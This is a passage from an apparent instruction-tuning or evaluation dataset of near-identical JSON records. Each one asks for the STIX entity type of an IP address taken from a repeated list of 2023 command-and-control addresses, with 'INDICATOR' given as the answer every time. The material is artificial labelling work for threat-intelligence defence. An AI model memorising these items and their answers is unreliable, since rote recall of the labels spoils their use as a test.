31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n84.32.131.38\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n146.190.117.209\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n170.64.146.194\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n84.32.191.147\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
"instruction": "You are a helpful threat intelligence analyst. Your task is to assign a STIX entity type to the given Entity in the input. To help you, here is a list of the possible STIX entity types.\nSTIX entity types:\n- ATTACK_PATTERN: A type of TTP that describes ways that adversaries attempt to compromise targets.\n- CAMPAIGN: A grouping of adversarial behaviors that describes a set of malicious activities or attacks (sometimes called waves) that occur over a period of time against a specific set of targets.\n- COURSE_OF_ACTION: A recommendation or mitigation from a producer of intelligence to a consumer on the actions that they might take in response to that intelligence.\n- IDENTITY: Actual individuals, organizations, or groups (e.g., ACME, Inc.) as well as classes of individuals, organizations, systems, or groups (e.g., the finance sector).\n- INDICATOR: Contains a pattern that can be used to detect suspicious or malicious cyber activity (e.g., IP Addresses, MAC Addresses, Hashes, filenames, registry keys, cryptocurrency wallets, etc.).\n- INFRASTRUCTURE: Represents a type of TTP and describes any systems, software services, and any associated physical or virtual resources intended to support some purpose (e.g., C2 servers used as part of an attack, device or server that are part of defense, database servers targeted by an attack, etc.).\n- LOCATION: Represents a geographic location (e.g., cities, countries, continents, regions, etc.).\n- MALWARE: A type of TTP that represents malicious code.\n- THREAT_ACTOR: Actual individuals, groups, or organizations believed to be operating with malicious intent.\n- TOOL: Legitimate software that can be used by threat actors to perform attacks.\n- VULNERABILITY: A mistake in software that can be directly used by a hacker to gain access to a system or network.\n. Choose STIX ENTITY TYPE from list of possible answers: [\"ATTACK_PATTERN\", \"CAMPAIGN\", \"COURSE_OF_ACTION\", \"IDENTITY\", \"INDICATOR\", \"INFRASTRUCTURE\", \"LOCATION\", \"MALWARE\", \"THREAT_ACTOR\", \"TOOL\", \"VULNERABILITY\"].\nAnswer in the following format: ONE OF STIX ENTITY TYPES ",
"input": "### Entity:\n149.28.125.56\n\n---\n\n### Text Passage:\n**Recent C &C infrastructure (2023)**\n* 45.76.141.166\n* 159.223.112.245\n* 140.82.56.186\n* 159.203.164.194\n* 45.32.94.58\n* 45.95.232.33\n* 139.59.109.100\n* 164.92.245.246\n* 45.32.101.6\n* 140.82.18.48\n* 216.128.140.45\n* 146.190.127.238\n* 207.148.74.68\n* 195.133.88.19\n* 146.190.60.230\n* 84.32.190.137\n* 206.189.154.168\n* 188.166.4.128\n* 104.248.54.250\n* 165.227.76.84\n* 66.42.104.158\n* 161.35.95.47\n* 149.28.125.56\n* 143.198.50.118\n* 66.42.126.121\n* 64.227.72.210\n* 81.19.140.147\n* 165.232.77.197\n* 146.190.117.209\n* 134.122.51.47\n* 143.198.152.232\n* 140.82.47.181\n* 159.223.102.109\n* 170.64.188.146\n* 155.138.194.244\n* 45.32.88.90\n* 89.185.84.32\n* 64.226.84.229\n* 206.189.14.94\n* 24.199.84.132\n* 45.32.41.115\n* 84.32.188.69\n* 206.189.128.172\n* 170.64.168.228\n* 161.35.238.148\n* 170.64.138.138\n* 178.128.86.43\n* 206.81.28.5\n* 178.128.231.180\n* 45.77.115.67\n* 136.244.65.253\n* 143.244.190.199\n* 159.65.176.121\n* 192.248.154.154\n* 209.97.175.128\n* 147.182.240.58\n* 146.190.212.239\n* 143.198.135.132\n* 45.76.202.102\n* 142.93.108.1\n* 46.101.127.147\n* 134.209.0.136\n* 138.68.110.19\n* 167.99.215.50\n* 161.35.232.118\n* 88.216.210.3\n* 165.227.121.87\n* 165.227.48.59\n* 108.61.211.250\n* 89.185.84.48\n* 167.172.69.123\n* 89.185.84.50\n* 206.189.0.134\n* 68.183.200.0\n* 178.128.16.170\n* 95.179.144.161\n* 164.92.222.8\n* 45.95.233.80\n* 78.141.239.24\n* 149.28.181.232\n* 24.199.107.218\n* 45.32.184.140\n* 167.172.20.159\n* 84.32.190.31\n* 164.92.185.60\n* 84.32.131.38\n* 137.184.178.46\n* 206.189.149.103\n* 157.245.176.123\n* 45.95.232.92\n* 45.95.232.29\n* 170.64.150.90\n* 89.185.84.45\n* 140.82.16.120\n* 84.32.185.136\n* 134.122.43.175\n* 195.133.88.55\n* 84.32.191.147\n* 78.141.238.136\n* 45.82.13.84\n* 159.65.248.0\n* 84.32.34.69\n* 170.64.146.194\n* 45.82.13.22\n* 45.82.13.23\n* 134.209.33.42\n* 199.247.8.115\n* 84.32.128.239\n* 173.199.70.238\n* 138.68.174.177\n* 178.128.213.177\n* 143.110.180.68\n* 167.172.144.127\n* 165.232.165.42\n* 45.95.232.51\n* 149.28.98.149\n* 104.156.230.193\n* 104.248.86.158\n* 134.122.51.47\n* 134.209.182.221\n* 139.59.60.191\n* 140.82.11.60\n* 140.82.47.181\n* 140.82.50.37\n* 143.198.135.132\n* 143.198.53.203\n* 147.182.250.33\n* 149.28.130.189\n* 149.28.181.232\n* 149.28.98.149\n* 155.138.194.244\n* 157.245.69.118\n* 158.247.204.242\n* 159.223.102.109\n* 159.223.23.23\n* 164.92.72.212\n* 165.22.72.74\n* 165.227.76.84\n* 165.232.120.169\n* 167.172.58.96\n* 167.71.67.58\n* 170.64.136.186\n* 170.64.140.214\n* 170.64.156.98\n* 178.128.228.252\n* 188.166.176.39\n* 188.166.7.140\n* 193.149.176.26\n* 195.133.88.55\n* 202.182.116.135\n* 202.182.98.100\n* 206.189.80.216\n* 207.148.72.173\n* 31.129.22.46\n* 31.129.22.48\n* 31.129.22.50\n* 45.32.101.6\n* 45.32.117.62\n* 45.32.158.96\n* 45.32.62.100\n* 45.32.88.90\n* 45.82.13.84\n* 45.95.232.33\n* 45.95.232.74\n* 45.95.233.80\n* 5.199.161.29\n* 64.226.84.229\n* 64.227.64.163\n* 66.42.104.158\n* 68.183.200.0\n* 78.141.239.24\n* 78.153.139.7\n* 81.19.140.147\n* 84.32.131.47\n* 84.32.188.13\n* 95.179.144.161\n* 95.179.245.185\n* 216.128.178.248\n",
"output": "INDICATOR"
},
{
